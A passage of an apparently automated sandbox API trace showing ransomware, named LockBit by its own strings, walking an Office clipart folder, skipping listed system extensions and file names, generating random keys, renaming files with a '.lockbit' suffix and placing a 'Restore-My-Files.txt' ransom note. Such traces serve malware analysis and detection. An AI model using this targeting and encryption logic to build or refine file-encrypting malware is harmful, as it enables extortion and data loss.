lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.377] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.lockbit") returned 72 [0118.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.378] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.378] malloc (_Size=0x40068) returned 0x3ef0008 [0118.378] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=26706) returned 1 [0118.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.379] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.386] malloc (_Size=0xa6) returned 0x77d7a8 [0118.386] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.387] free (_Block=0x77d7a8) [0118.387] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.387] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.387] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.387] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa90, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02155_.WMF", cAlternateFileName="")) returned 1 [0118.387] lstrcmpiW (lpString1=".", lpString2="HH02155_.WMF") returned -1 [0118.387] lstrcmpiW (lpString1="..", lpString2="HH02155_.WMF") returned -1 [0118.387] PathFindExtensionW (pszPath="HH02155_.WMF") returned=".WMF" [0118.387] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.387] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.387] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.387] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.387] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.388] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.389] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.389] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02155_.WMF") returned 1 [0118.389] lstrcmpiW (lpString1="ntldr", lpString2="HH02155_.WMF") returned 1 [0118.389] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02155_.WMF") returned 1 [0118.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02155_.WMF") returned -1 [0118.390] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02155_.WMF") returned -1 [0118.390] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02155_.WMF") returned 1 [0118.390] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02155_.WMF") returned 1 [0118.390] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.390] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF") returned=".WMF" [0118.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.390] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.390] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.391] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.391] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.lockbit") returned 72 [0118.391] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.392] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.392] malloc (_Size=0x40068) returned 0x3d70450 [0118.392] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2704) returned 1 [0118.392] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.392] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0118.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0118.393] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.398] malloc (_Size=0xa6) returned 0x77d7a8 [0118.398] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.398] free (_Block=0x77d7a8) [0118.398] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.399] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.399] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b48ba00, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b48ba00, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x52c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02166_.WMF", cAlternateFileName="")) returned 1 [0118.399] lstrcmpiW (lpString1=".", lpString2="HH02166_.WMF") returned -1 [0118.399] lstrcmpiW (lpString1="..", lpString2="HH02166_.WMF") returned -1 [0118.399] PathFindExtensionW (pszPath="HH02166_.WMF") returned=".WMF" [0118.399] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.399] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.400] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.400] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.401] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02166_.WMF") returned 1 [0118.402] lstrcmpiW (lpString1="ntldr", lpString2="HH02166_.WMF") returned 1 [0118.402] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02166_.WMF") returned 1 [0118.402] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02166_.WMF") returned -1 [0118.402] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02166_.WMF") returned -1 [0118.402] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02166_.WMF") returned 1 [0118.402] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02166_.WMF") returned 1 [0118.402] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.402] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned=".WMF" [0118.402] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.402] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.402] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.403] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.404] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.404] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.lockbit") returned 72 [0118.404] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.404] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.404] malloc (_Size=0x40068) returned 0x3df0530 [0118.418] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0548 | out: lpFileSize=0x3df0548*=1324) returned 1 [0118.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e30564, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e30564) returned 0x0 [0118.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e30574, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e30574) returned 0x0 [0118.419] ReadFile (in: hFile=0x308, lpBuffer=0x3df0564, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0530 | out: lpBuffer=0x3df0564*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0530) returned 1 [0118.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.474] malloc (_Size=0xa6) returned 0x77d7a8 [0118.474] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.475] free (_Block=0x77d7a8) [0118.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.475] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.475] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.475] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e4b800, ftCreationTime.dwHighDateTime=0x1bd4bf1, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb1e4b800, ftLastWriteTime.dwHighDateTime=0x1bd4bf1, nFileSizeHigh=0x0, nFileSizeLow=0x1efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02282_.WMF", cAlternateFileName="")) returned 1 [0118.476] lstrcmpiW (lpString1=".", lpString2="HH02282_.WMF") returned -1 [0118.476] lstrcmpiW (lpString1="..", lpString2="HH02282_.WMF") returned -1 [0118.476] PathFindExtensionW (pszPath="HH02282_.WMF") returned=".WMF" [0118.476] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.476] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.477] lstrcmpiW (lpString1=".bat", 